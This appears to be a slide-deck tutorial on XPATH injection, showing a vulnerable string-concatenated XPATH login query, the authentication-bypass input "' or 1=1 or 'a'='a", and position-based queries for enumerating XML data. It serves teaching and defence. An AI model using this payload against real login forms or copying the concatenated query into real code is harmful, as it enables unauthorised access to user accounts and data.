Injection Attacks: The Complete 2020 Guide

XPATH Injections - Overview

What is XPATH?

XPATH is a language that queries XML documents to locate information, and find elements that match certain patterns or contain certain attributes.

What is XPATH?

XPATH doesn't provide access controls or user authentication.

If you find an injection vulnerability, you can re-create the structure of the XML document and its data.

When do apps use XML and XPATH?

XML can be used as a database, where we can store a wide variety of data.

XPATH can be used to access that data from your application code.

Illustration...

MySQL -----> XML

SQL -----> XPATH

users.xml


<?xml version="1.0" encoding="utf-8"?>
<Users>
   <User ID="1">
      <FirstName>Christophe</FirstName>
      <LastName>Limpalair</LastName>
      <UserName>Christophe</UserName>
      <Password>daebcd6d6e32f42790d36807763a8061</Password>
      <Type>Admin</Type>
   </User>
   <User ID="2">
      <FirstName>Eric</FirstName>
      <LastName>G</LastName>
      <UserName>Eric</UserName>
      <Password>1a96179c675fe46550f052e1cf072f50</Password>
      <Type>User</Type>
   </Employee>
</Users>

XPATH query


FindUser = "//User[UserName/text()='" & Request("Username") & "' And
    Password/text()='" & Request("Password") & "']"
    
    

Username: ' or 1=1 or 'a'='a
Password: gfdjkngdfg
    
    

FindUser = "//User[UserName/text()='" & Request("Username") & "' And
    Password/text()='" & Request("Password") & "']"
    
    

Username: ' or 1=1 or 'a'='a
Password: gfdjkngdfg
    
    

FindUser = "//User[UserName/text()='" & Request("Username") & "' And
    Password/text()='" & Request("Password") & "']"
    
    

FindUser = "//User[UserName/text()='' or 1=1 or
    'a'='a' And Password/text()='gfdjkngdfg']"
    
    

FindUser = "//User[UserName/text()='' or 1=1 or
    'a'='a' And Password/text()='gfdjkngdfg']"
    
    

//User[(UserName/text()='' or 1=1) or
    ('a'='a' And Password/text()='gfdjkngdfg')]
    
    

The 2nd part of that statement doesn't even get evaluated since 1 always = 1



<?xml version="1.0" encoding="utf-8"?>
<Products>
   <Product ID="163">
      <ProductName>Cool Product</ProductName>
      <ProductDescription>These are details for this cool product</ProductDescription>
      <ProductPrice>$199</ProductPrice>
      <QuantityAvailable>45</QuantityAvailable>
      <ReleaseDate>2020</ReleaseDate>
   </Product>
   <Product ID="259">
      <ProductName>Cool Product v2</ProductName>
      <ProductDescription>These are details for this cool product v2</ProductDescription>
      <ProductPrice>$299</ProductPrice>
      <QuantityAvailable>10</QuantityAvailable>
      <ReleaseDate>2023</ReleaseDate>
   </Product>
</Products>


count(/Products/child::node()

Count the number of products


//Product[position()=1]

Extract specific nodes

Grab the first product in the XML document (indexes start at 1)


(//Product[position()=2]/child::node()[position()=3])

Extract the ProductPrice

Grab the 2nd product, and the 3rd node of that 2nd product


(//Product[position()=2]/child::node()[position()=3])

This assumes that...

  • You know the element names (Product)
  • You know which position the ProductPrice node is in (3)
  • You know what the structure of the XML document is

Overview of XPATH injections

By Christophe Limpalair

Overview of XPATH injections

  • 430